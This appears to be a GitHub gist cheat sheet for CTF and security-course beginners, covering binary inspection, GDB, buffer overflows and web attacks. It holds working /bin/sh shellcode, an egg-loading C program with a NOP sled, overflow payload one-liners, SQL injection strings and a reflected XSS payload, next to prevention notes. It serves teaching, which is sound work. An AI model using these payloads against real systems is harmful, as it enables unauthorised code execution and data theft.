-
-
Save sailik1991/c1d030edb98de7fead62061b5386c773 to your computer and use it in GitHub Desktop.
- Dot-dot and directory traversal attacks
- Linking
- Binary to ASM
- [View strings in binary](#view strings-in-binary)
- Checking system calls
- Debugging with GDB
- Shell code for /bin/sh from shell-storm
- Buffer overflow
- SQL Injection cheat sheet
- Making client side requests
- xinetd
This is where noobs start. If you are not sure what this is, this guide might not make much sense to you.
ls -sf /tmp/target /tmp/link
Using objdump
objdump -S binary.out | less
Pic - Adam Doupe
Using strings
strings binary.out
#or
objdump -s binary.out | less
ltrace -f binary.out
strace -f binary.out
(tutorial)
r binary.out
b <line_number/memory_address>
c (continues)
attach (ongoing process)
set detach-on-fork off (attach to forked child)
Ensuring same address works in debug mode and runtime is extremely important. Use this utility to make sure that the environment and argument stack remains the same in both the modes.
- Invocation:
$ invoke.sh binary.out # just call the executable
$ invoke.sh -d binary.out # run the executable in GDB
- Utility invoke.sh (don't forget to
chmod +x invloke.sh
)
!/bin/sh
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
else
exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
fi
else
exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi
Ref - stackoverflow
Shell code for /bin/sh from shell-storm
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
Create a new shell code that injects your code ('/bin/sh') into a new env variable, and invokes the corresponding shell. (tutorial)
/* eggcode.c */
#include <unistd.h>
#define NOP 0x90
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
int main(void)
{
char shell[512];
puts("Eggshell loaded into environment.\n");
memset(shell,NOP,512); /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
/* set the environment variable to */
/* EGG and shell as its value, rewrite if needed */
setenv("EGG", shell, 1);
/* modify the variable */
putenv(shell);
/* invoke the bash */
system("bash");
return 0;
}
Gets address of the first instruction of the malacious code
/* findeggaddr.c */
#include <unistd.h>
int main(void)
{
printf("EGG address: 0x%lx\n", getenv("EGG"));
return 0;
}
Exploit using overflow buffer - calculate stack address and inject using python or perl script. Eg.
`python -c "print 'A'x516 + '\x73\xf5\xff\xbf'"`
`perl -e 'print "A"x516'``printf "\x73\xf5\xff\xbf"`
Please keep in mind
- Endianess (inverse memory address)
- checking
env
after injecting shell code - size of datatypes (char-1, int-4, float-8, double-16 etc.) when overflowing buffers
Declaration | Allocation in memory |
---|---|
first | lower mem address |
last | higher mem address |
Pic - Adam Doupe
Checking for SQL injection:
- Normal
' or 1=1 --
- Blind returns same response for both if there is a user with user_name h4x0r
pressRelease.jsp?id=5
pressRelease.jsp?id=5 AND user_name()=‘h4x0r’
- Second Order injection Set user to john-- and change actual john's password using:
update users set password= … where username ='john'--'
Please ensure you see the cheat sheet for the correct technology. Here is the one for MySQL.
curl -H 'header=value' <ip/hostname>:<port>
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd http://192.168.84.167/code/purchase.php
nc <destination> <port> < input.txt #sending data to stdin
- Executable in /etc/xinetd.d
service <service_name>
{
socket_type = stream
protocol = tcp
user = <user_executing_this>
wait = no
server = /<path_to_binary>/<binary_with_x_permissions>
log_type = SYSLOG daemon debug
}
- Add service to /etc/services
<service_name> 11000/tcp
- Restart xinetd (we only need to do this if we change name of executable after patch)
sudo /etc/init.d/xinetd restart
- XSS prevention cheat-sheet
- SQL injection prevention cheat-sheet
Specify query structure and then provide parameters
$stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;");
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);
- PHP, the worst framework's cheat-sheet
- Remote OS command execution -
escapeshellcmd($str)
XSS Attacks:
- Reflected XSS attack
Example:
<?php $name = $_GET['name']; ?>
<html>
<body>
<p> Hello <?= $name ?></p>
</body>
</html>
Attack can take place by requesting untrusted data. Like
http://example.com?name=<script>alert('attack')</script>
sailik1991 - There are a thousand ways to evade checks and execute XSS
Here is a lost of all Filter Evasion techniques
this is useful
At present add your updates to the comment section.